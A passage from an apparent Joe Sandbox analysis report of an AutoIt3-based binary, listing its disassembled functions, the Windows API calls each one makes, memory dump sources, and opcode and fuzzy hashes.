                                                    • Part of subcall function 00C1F0BC: lstrcmpiW.KERNEL32(00000000,?,00C1DCD3,?,?,?,00C1EAC6,00000000,000000EF,00000119,?,?), ref: 00C1F122
                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C1DCEC
                                                  • lstrcpyW.KERNEL32(00000000,?,?,00C1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C1DD12
                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00C1EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00C1DD46
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: lstrcmpilstrcpylstrlen
                                                  • String ID: cdecl
                                                  • API String ID: 4031866154-3896280584
                                                  • Opcode ID: ddc603037a1cdf091207c20d90d64bc28683c6161ce7d94177886acd58bcd0bb
                                                  • Instruction ID: e6b0cfae368cd6b2714939d806505912405c1af11a0ddbb05294a33dcadc38d3
                                                  • Opcode Fuzzy Hash: ddc603037a1cdf091207c20d90d64bc28683c6161ce7d94177886acd58bcd0bb
                                                  • Instruction Fuzzy Hash: 9E11B43A100305EBCB15AF34D845ABE77A5FF46350B40816AF816CB260EB719981E7A1
                                                  Function 00BF50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00BF5101
                                                    • Part of subcall function 00BE571C: __FF_MSGBANNER.LIBCMT ref: 00BE5733
                                                    • Part of subcall function 00BE571C: __NMSG_WRITE.LIBCMT ref: 00BE573A
                                                    • Part of subcall function 00BE571C: RtlAllocateHeap.NTDLL(00ED0000,00000000,00000001,00000000,?,?,?,00BE0DD3,?), ref: 00BE575F
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap_free
                                                  • String ID:
                                                  • API String ID: 614378929-0
                                                  • Opcode ID: a29b2ea85c05596da77b49db5f5b923572b8289fefd5dd021e3ccd8f8cdfc73b
                                                  • Instruction ID: cc1f2449fcee680ae1b693aff3e7a732460c0dff01d4bdc13f9106edfc613be2
                                                  • Opcode Fuzzy Hash: a29b2ea85c05596da77b49db5f5b923572b8289fefd5dd021e3ccd8f8cdfc73b
                                                  • Instruction Fuzzy Hash: 02110672500A59AECB312FB5AC45B7E37D8EF01362F1005A9FB08BB162DF319A458790
                                                  Function 00C36369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C27896,?,?,00000000), ref: 00BC5A2C
                                                    • Part of subcall function 00BC5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C27896,?,?,00000000,?,?), ref: 00BC5A50
                                                  • gethostbyname.WSOCK32(?,?,?), ref: 00C36399
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C363A4
                                                  • _memmove.LIBCMT ref: 00C363D1
                                                  • inet_ntoa.WSOCK32(?), ref: 00C363DC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                  • String ID:
                                                  • API String ID: 1504782959-0
                                                  • Opcode ID: 67700fbe3012aeace98ec40fe2c66250c84061c3a631962ea931ce178f0415ee
                                                  • Instruction ID: 42e1a81e98097cc6958f2c9074c0191fc60f5b68323059814c907d81180b16fe
                                                  • Opcode Fuzzy Hash: 67700fbe3012aeace98ec40fe2c66250c84061c3a631962ea931ce178f0415ee
                                                  • Instruction Fuzzy Hash: 81118276900109AFCB04FFA4DD46EEEB7F8BF09310B1441A9F505A71A2DB30AE54DB61
                                                  Function 00C18B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00C18B61
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C18B73
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C18B89
                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C18BA4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 6255e08d9d583bcc99fce2b3e596d27a6bc06a91fa7549233dbadc06838884fe
                                                  • Instruction ID: 9e9bed75e78447ac3b9be03acf1349ec6e4f416e51e93160cd529ebbaeab4979
                                                  • Opcode Fuzzy Hash: 6255e08d9d583bcc99fce2b3e596d27a6bc06a91fa7549233dbadc06838884fe
                                                  • Instruction Fuzzy Hash: C6113A79905218BFDB10DB95CC84FDDBB74FB49710F204095E900B7250DA716E51EB94
                                                  Function 00BC1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • DefDlgProcW.USER32(?,00000020,?), ref: 00BC12D8
                                                  • GetClientRect.USER32(?,?), ref: 00BFB5FB
                                                  • GetCursorPos.USER32(?), ref: 00BFB605
                                                  • ScreenToClient.USER32(?,?), ref: 00BFB610
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                  • String ID:
                                                  • API String ID: 4127811313-0
                                                  • Opcode ID: fd800e6050488a9f0233f9d90c51082680325d0ec9a4df604662c2650aa8d090
                                                  • Instruction ID: 5fcd40faa32d5370690c4f70513ed9ab6cdbe692e0f0d318c0dc54a67748b4c6
                                                  • Opcode Fuzzy Hash: fd800e6050488a9f0233f9d90c51082680325d0ec9a4df604662c2650aa8d090
                                                  • Instruction Fuzzy Hash: E9112839900019ABDB00EF98D885EEEB7F8FB06301F40089AF941EB141C730AA528BA5
                                                  Function 00C21142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C1FCED,?,00C20D40,?,00008000), ref: 00C2115F
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C1FCED,?,00C20D40,?,00008000), ref: 00C21184
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C1FCED,?,00C20D40,?,00008000), ref: 00C2118E
                                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,00C1FCED,?,00C20D40,?,00008000), ref: 00C211C1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CounterPerformanceQuerySleep
                                                  • String ID:
                                                  • API String ID: 2875609808-0
                                                  • Opcode ID: 0327682151b509705b605036a43b5fb02b779608a0ca4ff58931cda064750330
                                                  • Instruction ID: f2b88667a10b8d22d0c04e7267824e1a5e22464e405b0e15d3a2f2b61af9b675
                                                  • Opcode Fuzzy Hash: 0327682151b509705b605036a43b5fb02b779608a0ca4ff58931cda064750330
                                                  • Instruction Fuzzy Hash: 8F112E35D0062DD7CF009FA5E8487EEBBB8FF29711F054059EE55B2240CB7055A1CB96
                                                  Function 00C1D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00C1D84D
                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00C1D864
                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00C1D879
                                                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00C1D897
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                  • String ID:
                                                  • API String ID: 1352324309-0
                                                  • Opcode ID: e0524e1b7e29e4982340ba0c0a12f5ce09c5a539aaf4f8431e377f5735121da1
                                                  • Instruction ID: e1ad4bcdf0a8e64b3f03233dce3b21ec4bcc2a587a98bc544313344037a89098
                                                  • Opcode Fuzzy Hash: e0524e1b7e29e4982340ba0c0a12f5ce09c5a539aaf4f8431e377f5735121da1
                                                  • Instruction Fuzzy Hash: 4F113C75605304DBF3208F51EC08FD6BBB8EB01B10F10856DA916D6190D7B0E689ABE1
                                                  Function 00BF6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                  • String ID:
                                                  • API String ID: 3016257755-0
                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction ID: 28862888ed27b593d59d43dfd5d9fc1e2d15d52d7103e34756810cbecf51846c
                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                  • Instruction Fuzzy Hash: 7301723208414EBBCF125E98DC41CED3FA2FF18350B588495FF185A030CA36C9B9AB81
                                                  Function 00C4B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowRect.USER32(?,?), ref: 00C4B2E4
                                                  • ScreenToClient.USER32(?,?), ref: 00C4B2FC
                                                  • ScreenToClient.USER32(?,?), ref: 00C4B320
                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C4B33B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                  • String ID:
                                                  • API String ID: 357397906-0
                                                  • Opcode ID: 712c966438a0824b9b82285d79de45205f9c76fcee161db16ee7ce80a7103058
                                                  • Instruction ID: 0c855c3af73848ae2484fdf5b3ec605243a116126f2d7e368eb2079975458ffc
                                                  • Opcode Fuzzy Hash: 712c966438a0824b9b82285d79de45205f9c76fcee161db16ee7ce80a7103058
                                                  • Instruction Fuzzy Hash: 6C114679D00209EFDB41CF99D444AEEFBF5FB09310F104166E914E3220D735AA658F50
                                                  Function 00C4B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C4B644
                                                  • _memset.LIBCMT ref: 00C4B653
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C86F20,00C86F64), ref: 00C4B682
                                                  • CloseHandle.KERNEL32 ref: 00C4B694
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseCreateHandleProcess
                                                  • String ID:
                                                  • API String ID: 3277943733-0
                                                  • Opcode ID: f4adda3d896a2acd72dfa46a0f67c60f72fd689f13e3142f688f4b2a6e7a6ffc
                                                  • Instruction ID: 86b206be63d898e7b0de272d86d536c366345dad90693a28ee6941f528fbfdcd
                                                  • Opcode Fuzzy Hash: f4adda3d896a2acd72dfa46a0f67c60f72fd689f13e3142f688f4b2a6e7a6ffc
                                                  • Instruction Fuzzy Hash: 8BF0FEF2540304BAE6106BA5BC06FBF7A9CEB09795F004035BB08E51A2D775DC1187AC
                                                  Function 00C26BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00C26BE6
                                                    • Part of subcall function 00C276C4: _memset.LIBCMT ref: 00C276F9
                                                  • _memmove.LIBCMT ref: 00C26C09
                                                  • _memset.LIBCMT ref: 00C26C16
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00C26C26
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                  • String ID:
                                                  • API String ID: 48991266-0
                                                  • Opcode ID: 695e2d14cc0c63a1a059d30495dc7d404570a002e4c7b6359d4fcd7f2504bb4a
                                                  • Instruction ID: 21f0e5a7ba406ee6dbfffe647eded0540b2f049997de721ab06a1d1fbf7a13eb
                                                  • Opcode Fuzzy Hash: 695e2d14cc0c63a1a059d30495dc7d404570a002e4c7b6359d4fcd7f2504bb4a
                                                  • Instruction Fuzzy Hash: 7DF05E3A200210ABCF016F95EC85B8ABB69EF46320F04C0A5FE085E227C771E811DBB4
                                                  Function 00BC2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSysColor.USER32(00000008), ref: 00BC2231
                                                  • SetTextColor.GDI32(?,000000FF), ref: 00BC223B
                                                  • SetBkMode.GDI32(?,00000001), ref: 00BC2250
                                                  • GetStockObject.GDI32(00000005), ref: 00BC2258
                                                  • GetWindowDC.USER32(?,00000000), ref: 00BFBE83
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00BFBE90
                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 00BFBEA9
                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 00BFBEC2
                                                  • GetPixel.GDI32(00000000,?,?), ref: 00BFBEE2
                                                  • ReleaseDC.USER32(?,00000000), ref: 00BFBEED
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                  • String ID:
                                                  • API String ID: 1946975507-0
                                                  • Opcode ID: fb74b855005aa7dd9ff98895edd9be62a1d4033b5342159f9d9fd52722cd114d
                                                  • Instruction ID: f6d1ca58c0cdd06d316a649303bf96377a94fb88e10e369809442c74f344c9ee
                                                  • Opcode Fuzzy Hash: fb74b855005aa7dd9ff98895edd9be62a1d4033b5342159f9d9fd52722cd114d
                                                  • Instruction Fuzzy Hash: 71E03036104144EADF215F64EC0DBDC3B50EB06332F0083AAFA69580E187B14585DB11
                                                  Function 00C18712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 00C1871B
                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C182E6), ref: 00C18722
                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C182E6), ref: 00C1872F
                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C182E6), ref: 00C18736
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CurrentOpenProcessThreadToken
                                                  • String ID:
                                                  • API String ID: 3974789173-0
                                                  • Opcode ID: 250e0a95186b2706492128a965846c72506f7bec74c4b454f8471628a5ea71ee
                                                  • Instruction ID: f5acdd788076eee3a8903cac6b2355ae25fc7bda7d964d758f39ddd94c185a24
                                                  • Opcode Fuzzy Hash: 250e0a95186b2706492128a965846c72506f7bec74c4b454f8471628a5ea71ee
                                                  • Instruction Fuzzy Hash: 90E0863A6152119BD7205FB05D0CB9F3BACFF52791F14482CB245C9090DA748486D750
                                                  Function 00BE5DAC Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __getptd_noexit.LIBCMT ref: 00BE5DAD
                                                    • Part of subcall function 00BE99C4: GetLastError.KERNEL32(00000000,00BE0DD3,00BE8B2D,00BE57A3,?,?,00BE0DD3,?), ref: 00BE99C6
                                                    • Part of subcall function 00BE99C4: __calloc_crt.LIBCMT ref: 00BE99E7
                                                    • Part of subcall function 00BE99C4: __initptd.LIBCMT ref: 00BE9A09
                                                    • Part of subcall function 00BE99C4: GetCurrentThreadId.KERNEL32 ref: 00BE9A10
                                                    • Part of subcall function 00BE99C4: SetLastError.KERNEL32(00000000,00BE0DD3,?), ref: 00BE9A28
                                                  • CloseHandle.KERNEL32(?,?,00BE5D8C), ref: 00BE5DC1
                                                  • __freeptd.LIBCMT ref: 00BE5DC8
                                                  • ExitThread.KERNEL32 ref: 00BE5DD0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit__initptd
                                                  • String ID:
                                                  • API String ID: 4169687693-0
                                                  • Opcode ID: bf40ba9cd83c57f423824d72d0b9e9ba66843ae2913bee2ee4acece97f7fa14a
                                                  • Instruction ID: 353943c0ee3f1ff157f6d3fda0083bd7aaa300ac9e80b3172341d128c9ea7a80
                                                  • Opcode Fuzzy Hash: bf40ba9cd83c57f423824d72d0b9e9ba66843ae2913bee2ee4acece97f7fa14a
                                                  • Instruction Fuzzy Hash: 35D0A735401F5047C2322B718C0DB2D33D0EF01B35B04C36CF065451F18B2458038641
                                                  Function 00C1B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 00C1B4BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ContainedObject
                                                  • String ID: AutoIt3GUI$Container
                                                  • API String ID: 3565006973-3941886329
                                                  • Opcode ID: c1346cf3f932cc09be0ad7f9a6aa6b8639a9aa6f826f52d918a7c4651deb1178
                                                  • Instruction ID: e956249d4677a0ffe2878a845f42892d31282269d93d7601b3398abfe8a7bc98
                                                  • Opcode Fuzzy Hash: c1346cf3f932cc09be0ad7f9a6aa6b8639a9aa6f826f52d918a7c4651deb1178
                                                  • Instruction Fuzzy Hash: FE913870600601AFDB14DF65C884AAAB7E5FF4A710F20856DF95ACB2A1DB70ED81DF50
                                                  Function 00C2AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                  Download Yara Rule
                                                  APIs
